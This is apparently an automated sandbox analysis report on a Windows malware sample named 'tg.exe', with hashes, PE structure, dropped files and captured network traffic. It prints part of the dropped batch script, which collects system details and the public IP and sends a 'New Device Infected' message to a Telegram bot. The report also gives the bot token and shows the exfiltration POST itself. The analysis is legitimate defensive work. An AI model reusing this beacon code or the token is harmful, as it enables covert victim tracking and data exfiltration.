SSDEEP:	24:QxiRbZbBiRqB3+QeL/7Amk7qaO7osBtHstuLMiv2Af+wPj:rbdBiEBut/7D+yok1s8LZv2A28
MD5:	D094D92CFDD4BA9B839122A175C59130
SHA1:	599DFD03AB835DA6C53D468E79405A369FBA8BC6
SHA-256:	DD3B2B5FB6ED84798054474779F953DFBB93359FB46B1B0C235F348904794751
SHA-512:	8088FBEF90F5EF5BF4948F6A41B74D26DBE5605FB0D540FE434D206CDB12B8AC9A8362CF550C4B5D73BFD99F07EC49AA8347BB8531ED8F557B999A549DE26F5D
Malicious:	true
Preview:	@shift /0..@echo off..:: Define Telegram bot details..set botToken=7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ..set chatId=6734985705....:: Get current date and time using PowerShell..for /f "delims=" %%i in ('powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"') do set currentDate=%%i....:: Get the public IP address..for /f "delims=" %%i in ('powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"') do set publicIp=%%i....:: Get local machine information (hostname, OS version, and architecture)..for /f "delims=" %%i in ('powershell -Command "$env:COMPUTERNAME"') do set hostname=%%i..for /f "delims=" %%i in ('powershell -Command "[System.Environment]::OSVersion"') do set os=%%i..for /f "delims=" %%i in ('powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"') do set architecture=%%i....:: Compose the message..set message= @New Device Infected!!!, > System Information: Date: %currentDate%, Hostname: %hostname%,

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3xbx0foa.ep5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ggphfjo.dmg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bopvxlpi.ygr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g21ldsmu.15n.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_guvfco2i.kyg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3sy33n3.wqb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_imlafvh0.1l1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mb2jaycx.cbw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nbqxksni.pm1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tex3cpej.e3y.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z1vuzy1k.33r.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zcezainx.mev.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.718119277627621
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	tg.exe
File size:	90'112 bytes
MD5:	f8ecedc88e4d2776486231d0ef0aea5d
SHA1:	fccc180c84dec726668d48f09b8a0c1c1fba07a1
SHA256:	b5c30a14e79065ea9a095eca6655829aca6272e61b1a73a31fa376ff8b3a793b
SHA512:	0aa1f775851a400ed6513db836f2788c0d902fb492b91195c234d1067e548bdac202e69cd3e366d1c73c0db917c474e93f38f20173c38a78c4ba6804a364fa41
SSDEEP:	1536:r7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf4xQ1HpOK:nq6+ouCpk2mpcWJ0r+QNTBf4o/
TLSH:	58936C45F3E241F7E9F10A7100A6712FA73567249724E8DBC34C3D829A53AD5AA3C3E9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b.@]...............2.....P...............0....@........................................................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x401000
Entrypoint Section:	.code
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x5D400562 [Tue Jul 30 08:52:50 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5877688b4859ffd051f6be3b8e0cd533

Entrypoint Preview

Instruction
push 000000ACh
push 00000000h
push 00418010h
call 00007FB0587D6B61h
add esp, 0Ch
push 00000000h
call 00007FB0587D6B5Ah
mov dword ptr [00418014h], eax
push 00000000h
push 00001000h
push 00000000h
call 00007FB0587D6B47h
mov dword ptr [00418010h], eax
call 00007FB0587D6AC1h
mov eax, 00417088h
mov dword ptr [00418034h], eax
call 00007FB0587DF8E2h
call 00007FB0587DF64Eh
call 00007FB0587DC548h
call 00007FB0587DBDCCh
call 00007FB0587DB85Fh
call 00007FB0587DB5D9h
call 00007FB0587DB0FDh
call 00007FB0587DA87Dh
call 00007FB0587D6E45h
call 00007FB0587DE1C8h
call 00007FB0587DCC70h
mov edx, 0041702Eh
lea ecx, dword ptr [0041801Ch]
call 00007FB0587D6AD8h
push FFFFFFF5h
call 00007FB0587D6AE8h
mov dword ptr [0041803Ch], eax
mov eax, 00000200h
push eax
lea eax, dword ptr [004180B8h]
push eax
xor eax, eax
push eax
push 00000015h
push 00000004h
call 00007FB0587DB822h
push dword ptr [004180A0h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1717c	0xc8	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x19000	0x998	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x17470	0x22c	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.code	0x1000	0x37f0	0x3800	6c0f4094a5493360ae8c9032ef3a9f47	False	0.47140066964285715	data	5.608776130769213	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.text	0x5000	0xd2c2	0xd400	1da643e4b1937b50550f9d9e8250428e	False	0.5114239386792453	data	6.558083729279072	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x13000	0x339d	0x3400	4fb07923b0eb72c40319d48fd2d4f13f	False	0.8046123798076923	data	7.110640338733979	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x17000	0x172c	0x1200	34f7102d67c306b13e756c4ee64941b7	False	0.3940972222222222	data	4.998662531771307	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x19000	0x998	0xa00	6fda2be127937fd56d1abb5a30715707	False	0.78203125	data	7.045547828568311	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_RCDATA	0x1921c	0x1	very short file (no magic)	9.0
RT_RCDATA	0x19220	0x6	Non-ISO extended-ASCII text, with no line terminators	2.3333333333333335
RT_RCDATA	0x19228	0x4fa	data	1.0086342229199372
RT_RCDATA	0x19724	0xe	zlib compressed data	1.5714285714285714
RT_MANIFEST	0x19734	0x263	XML 1.0 document, ASCII text	0.5319148936170213

Imports

DLL	Import
MSVCRT.dll	memset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, memcpy, tolower, wcscat, malloc
KERNEL32.dll	GetModuleHandleW, HeapCreate, GetStdHandle, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, GetExitCodeProcess, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetNativeSystemInfo, GetShortPathNameW, GetWindowsDirectoryW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, Sleep, GetProcAddress, GetVersionExW, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, TerminateProcess, SetUnhandledExceptionFilter, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, InterlockedCompareExchange, InterlockedExchange, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, DuplicateHandle, RegisterWaitForSingleObject
USER32.DLL	CharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, DestroyWindow, GetWindowLongW, GetWindowTextLengthW, GetWindowTextW, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, EnableWindow, GetSystemMetrics, CreateWindowExW, SetWindowLongW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
GDI32.DLL	GetStockObject
COMCTL32.DLL	InitCommonControlsEx
SHELL32.DLL	ShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
WINMM.DLL	timeBeginPeriod
OLE32.DLL	CoInitialize, CoTaskMemFree
SHLWAPI.DLL	PathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2024 01:11:03.686347961 CET	49730	443	192.168.2.4	104.26.12.205
Dec 23, 2024 01:11:03.686403036 CET	443	49730	104.26.12.205	192.168.2.4
Dec 23, 2024 01:11:03.686526060 CET	49730	443	192.168.2.4	104.26.12.205
Dec 23, 2024 01:11:03.698476076 CET	49730	443	192.168.2.4	104.26.12.205
Dec 23, 2024 01:11:03.698515892 CET	443	49730	104.26.12.205	192.168.2.4
Dec 23, 2024 01:11:04.916392088 CET	443	49730	104.26.12.205	192.168.2.4
Dec 23, 2024 01:11:04.916513920 CET	49730	443	192.168.2.4	104.26.12.205
Dec 23, 2024 01:11:04.928585052 CET	49730	443	192.168.2.4	104.26.12.205
Dec 23, 2024 01:11:04.928605080 CET	443	49730	104.26.12.205	192.168.2.4
Dec 23, 2024 01:11:04.928955078 CET	443	49730	104.26.12.205	192.168.2.4
Dec 23, 2024 01:11:04.976507902 CET	49730	443	192.168.2.4	104.26.12.205
Dec 23, 2024 01:11:05.010026932 CET	49730	443	192.168.2.4	104.26.12.205
Dec 23, 2024 01:11:05.051335096 CET	443	49730	104.26.12.205	192.168.2.4
Dec 23, 2024 01:11:05.356234074 CET	443	49730	104.26.12.205	192.168.2.4
Dec 23, 2024 01:11:05.356304884 CET	443	49730	104.26.12.205	192.168.2.4
Dec 23, 2024 01:11:05.356483936 CET	49730	443	192.168.2.4	104.26.12.205
Dec 23, 2024 01:11:05.363168001 CET	49730	443	192.168.2.4	104.26.12.205
Dec 23, 2024 01:11:07.325707912 CET	49731	443	192.168.2.4	149.154.167.220
Dec 23, 2024 01:11:07.325754881 CET	443	49731	149.154.167.220	192.168.2.4
Dec 23, 2024 01:11:07.325848103 CET	49731	443	192.168.2.4	149.154.167.220
Dec 23, 2024 01:11:07.332587957 CET	49731	443	192.168.2.4	149.154.167.220
Dec 23, 2024 01:11:07.332604885 CET	443	49731	149.154.167.220	192.168.2.4
Dec 23, 2024 01:11:08.701838970 CET	443	49731	149.154.167.220	192.168.2.4
Dec 23, 2024 01:11:08.702076912 CET	49731	443	192.168.2.4	149.154.167.220
Dec 23, 2024 01:11:08.706166983 CET	49731	443	192.168.2.4	149.154.167.220
Dec 23, 2024 01:11:08.706207037 CET	443	49731	149.154.167.220	192.168.2.4
Dec 23, 2024 01:11:08.706564903 CET	443	49731	149.154.167.220	192.168.2.4
Dec 23, 2024 01:11:08.719089985 CET	49731	443	192.168.2.4	149.154.167.220
Dec 23, 2024 01:11:08.763328075 CET	443	49731	149.154.167.220	192.168.2.4
Dec 23, 2024 01:11:09.075869083 CET	49731	443	192.168.2.4	149.154.167.220
Dec 23, 2024 01:11:09.075891018 CET	443	49731	149.154.167.220	192.168.2.4
Dec 23, 2024 01:11:09.318373919 CET	443	49731	149.154.167.220	192.168.2.4
Dec 23, 2024 01:11:09.362508059 CET	49731	443	192.168.2.4	149.154.167.220
Dec 23, 2024 01:11:09.653491974 CET	443	49731	149.154.167.220	192.168.2.4
Dec 23, 2024 01:11:09.653876066 CET	443	49731	149.154.167.220	192.168.2.4
Dec 23, 2024 01:11:09.653959036 CET	49731	443	192.168.2.4	149.154.167.220
Dec 23, 2024 01:11:09.654959917 CET	49731	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2024 01:11:03.445688009 CET	51495	53	192.168.2.4	1.1.1.1
Dec 23, 2024 01:11:03.672095060 CET	53	51495	1.1.1.1	192.168.2.4
Dec 23, 2024 01:11:07.180321932 CET	64108	53	192.168.2.4	1.1.1.1
Dec 23, 2024 01:11:07.318198919 CET	53	64108	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 23, 2024 01:11:03.445688009 CET	192.168.2.4	1.1.1.1	0x44f8	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Dec 23, 2024 01:11:07.180321932 CET	192.168.2.4	1.1.1.1	0x4746	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 23, 2024 01:11:03.672095060 CET	1.1.1.1	192.168.2.4	0x44f8	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Dec 23, 2024 01:11:03.672095060 CET	1.1.1.1	192.168.2.4	0x44f8	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Dec 23, 2024 01:11:03.672095060 CET	1.1.1.1	192.168.2.4	0x44f8	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Dec 23, 2024 01:11:07.318198919 CET	1.1.1.1	192.168.2.4	0x4746	No error (0)	api.telegram.org	149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.26.12.205	443	7772	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 00:11:05 UTC	170	OUT	GET /?format=text HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: api.ipify.org Connection: Keep-Alive
2024-12-23 00:11:05 UTC	424	IN	HTTP/1.1 200 OK Date: Mon, 23 Dec 2024 00:11:05 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8f6421dd6ffe43f1-EWR server-timing: cfL4;desc="?proto=TCP&rtt=2029&min_rtt=2023&rtt_var=771&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=784&delivery_rate=1409266&cwnd=218&unsent_bytes=0&cid=76c4759e5a64a1f1&ts=450&x=0"
2024-12-23 00:11:05 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	149.154.167.220	443	8176	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-23 00:11:08 UTC	315	OUT	POST /bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 260 Expect: 100-continue Connection: Keep-Alive
2024-12-23 00:11:09 UTC	260	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 36 37 33 34 39 38 35 37 30 35 26 74 65 78 74 3d 2b 25 34 30 4e 65 77 2b 44 65 76 69 63 65 2b 49 6e 66 65 63 74 65 64 21 21 21 25 32 43 2b 2b 49 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 41 2b 44 61 74 65 25 33 41 2b 32 30 32 34 2d 31 32 2d 32 32 2b 31 39 25 33 41 31 32 25 33 41 30 37 25 32 43 2b 2b 48 6f 73 74 6e 61 6d 65 25 33 41 2b 4a 4f 4e 45 53 2d 50 43 25 32 43 2b 4f 53 25 33 41 2b 2b 57 69 6e 33 32 4e 54 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 31 30 2e 30 2e 31 39 30 34 35 2e 30 2b 4d 69 63 72 6f 73 6f 66 74 2b 57 69 6e 64 6f 77 73 2b 4e 54 2b 31 30 2e 30 2e 31 39 30 34 35 2e 30 25 32 43 2b 2b 41 72 63 68 69 74 65 63 74 75 72 65 25 33 41 2b 36 34 2d 62 69 74 25 32 43 2b 2b 50 75 62 6c 69 63 2b 49 50 25 33 41 2b 38 2e 34 36 2e 31 32 Data Ascii: chat_id=6734985705&text=+%40New+Device+Infected!!!%2C++Information%3A+Date%3A+2024-12-22+19%3A12%3A07%2C++Hostname%3A+user-PC%2C+OS%3A++Win32NT+++++++++++++10.0.19045.0+Microsoft+Windows+NT+10.0.19045.0%2C++Architecture%3A+64-bit%2C++Public+IP%3A+8.46.12
2024-12-23 00:11:09 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-23 00:11:09 UTC	882	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 23 Dec 2024 00:11:09 GMT Content-Type: application/json Content-Length: 494 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":47,"from":{"id":7879910740,"is_bot":true,"first_name":"catch","username":"catch2025_bot"},"chat":{"id":6734985705,"first_name":"R","username":"cjsjdjja","type":"private"},"date":1734912669,"text":"@New Device Infected!!!, Information: Date: 2024-12-22 19:12:07, Hostname: user-PC, OS: Win32NT 10.0.19045.0 Microsoft Windows NT 10.0.19045.0, Architecture: 64-bit, Public IP: 8.46.123.189","entities":[{"offset":195,"length":12,"type":"url"}]}}

Target ID:	0
Start time:	19:10:59
Start date:	22/12/2024
Path:	C:\Users\user\Desktop\tg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\tg.exe"
Imagebase:	0x400000
File size:	90'112 bytes
